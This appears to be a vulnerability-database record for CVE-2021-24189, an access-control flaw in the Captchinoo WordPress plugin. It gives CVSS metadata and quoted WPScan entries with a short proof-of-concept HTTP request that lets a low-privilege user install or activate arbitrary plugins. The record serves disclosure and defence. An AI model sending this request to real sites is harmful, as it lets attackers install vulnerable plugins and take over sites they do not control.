Low privileged users can use the AJAX action 'cp_plugins_do_button_job_later_callback' in the Captchinoo, Google recaptcha for admin login page WordPress plugin before 2.4, to install any plugin (including a specific version) from the WordPress repository, as well as activate arbitrary plugin from then blog, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE.
{"id": "CVE-2021-24189", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24189", "description": "Low privileged users can use the AJAX action 'cp_plugins_do_button_job_later_callback' in the Captchinoo, Google recaptcha for admin login page WordPress plugin before 2.4, to install any plugin (including a specific version) from the WordPress repository, as well as activate arbitrary plugin from then blog, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE.", "published": "2021-05-14T12:15:00", "modified": "2021-05-26T16:20:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24189", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/74889e29-5349-43d1-baf5-1622493be90c"], "cvelist": ["CVE-2021-24189"], "immutableFields": [], "lastseen": "2022-03-23T14:48:57", "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:74889E29-5349-43D1-BAF5-1622493BE90C"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:74889E29-5349-43D1-BAF5-1622493BE90C"]}], "rev": 4}, "score": {"value": 4.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:74889E29-5349-43D1-BAF5-1622493BE90C"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:74889E29-5349-43D1-BAF5-1622493BE90C"]}]}, "exploitation": null, "vulnersScore": 4.1}, "_state": {"dependencies": 1659899726, "score": 1659843777}, "_internal": {"score_hash": "6a60486fd4322d66cf98cfae7822c71a"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["NVD-CWE-noinfo"], "affectedSoftware": [{"cpeName": "wp-buy:captchinoo", "version": "2.4", "operator": "lt", "name": "wp-buy captchinoo"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:wp-buy:captchinoo:2.4:*:*:*:*:wordpress:*:*", "versionEndExcluding": "2.4", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/74889e29-5349-43d1-baf5-1622493be90c", "name": "https://wpscan.com/vulnerability/74889e29-5349-43d1-baf5-1622493be90c", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Third Party Advisory"]}]}
{"wpexploit": [{"lastseen": "2021-05-28T19:26:14", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-24188", "CVE-2021-24189", "CVE-2021-24190", "CVE-2021-24191", "CVE-2021-24192", "CVE-2021-24193", "CVE-2021-24194", "CVE-2021-24195"], "description": "Low privileged users could use the AJAX action \"cp_plugins_do_button_job_later_callback\" from multiple plugins of the WP-Buy vendor, to install any plugin (including a specific version) from the WordPress repository, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE. Note (WPScanTeam): The same AJAX action could also be used to activate installed plugins on the blog. \n", "modified": "2021-04-24T07:01:14", "published": "2021-04-22T00:00:00", "id": "WPEX-ID:74889E29-5349-43D1-BAF5-1622493BE90C", "href": "", "type": "wpexploit", "title": "Multiple WP-Buy Plugins - Arbitrary Plugin Installation/Activation via Low Privilege User ", "sourceData": "Vulnerable code : \r\n cp_plugins_do_button_job_later_callback() method in settings-start-index.php file\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nX-Requested-With: XMLHttpRequest\r\nCookie: [Low Privilege User cookie]\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 46\r\n\r\naction=do_button_job_later&slug=plugin_slug.version\r\n\r\n\r\nTo activate installed plugins, use the same request, but with the plugin_file instead of slug parameter", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-05-28T19:26:14", "bulletinFamily": "software", "cvelist": ["CVE-2021-24188", "CVE-2021-24189", "CVE-2021-24190", "CVE-2021-24191", "CVE-2021-24192", "CVE-2021-24193", "CVE-2021-24194", "CVE-2021-24195"], "description": "Low privileged users could use the AJAX action \"cp_plugins_do_button_job_later_callback\" from multiple plugins of the WP-Buy vendor, to install any plugin (including a specific version) from the WordPress repository, which helps attackers install vulnerable plugins and could lead to more critical vulnerabilities like RCE. Note (WPScanTeam): The same AJAX action could also be used to activate installed plugins on the blog. \n\n### PoC\n\nVulnerable code : cp_plugins_do_button_job_later_callback() method in settings-start-index.php file POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Cookie: [Low Privilege User cookie] Content-Type: application/x-www-form-urlencoded Content-Length: 46 action=do_button_job_later&slug;=plugin_slug.version To activate installed plugins, use the same request, but with the plugin_file instead of slug parameter\n", "modified": "2021-04-24T07:01:14", "id": "WPVDB-ID:74889E29-5349-43D1-BAF5-1622493BE90C", "href": "https://wpscan.com/vulnerability/74889e29-5349-43d1-baf5-1622493be90c", "published": "2021-04-22T00:00:00", "type": "wpvulndb", "title": "Multiple WP-Buy Plugins - Arbitrary Plugin Installation/Activation via Low Privilege User ", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}
CVE-2021-24189
